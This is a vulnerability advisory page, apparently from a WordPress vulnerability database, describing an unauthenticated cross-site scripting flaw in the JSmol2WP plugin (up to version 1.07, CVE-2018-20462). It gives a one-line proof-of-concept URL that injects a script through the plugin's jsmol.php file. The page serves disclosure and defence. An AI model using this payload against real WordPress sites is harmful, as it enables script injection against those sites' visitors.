Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbRyan DewhurstWPVDB-ID:0BBF1542-6E00-4A68-97F6-48A7790D1C3E
HistoryJan 07, 2019 - 12:00 a.m.

JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)

2019-01-0700:00:00
Ryan Dewhurst
wpscan.com
12
JSON

The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.

PoC

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&amp;call;=saveFile&amp;data;=<script>alert(/xss/)</script>&amp;mimetype;=text/html; charset=utf-8

CPENameOperatorVersion
jsmol2wpeq*

Related

patchstack 1
cvelist 1
wpexploit 1
prion 1
cve 1
nuclei 2
patchstack
patchstack
WordPress JSmol2WP plugin <= 1.07 - Unauthenticated Cross-Site Scripting (XSS) vulnerability
2019-01-08 00:00:00
cvelist
cvelist
CVE-2018-20462
2018-12-25 21:00:00
wpexploit
wpexploit
JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
2019-01-07 00:00:00
prion
prion
Cross site scripting
2018-12-25 21:29:00
cve
cve
CVE-2018-20462
2018-12-25 21:29:00
nuclei
nuclei
WordPress JSmol2WP <=1.07 - Cross-Site Scripting
2021-07-15 17:12:52
WordPress JSmol2WP <=1.07 - Local File Inclusion
2022-08-19 13:39:06
JSON
Related for WPVDB-ID:0BBF1542-6E00-4A68-97F6-48A7790D1C3E
patchstack1cvelist1wpexploit1prion1cve1nuclei2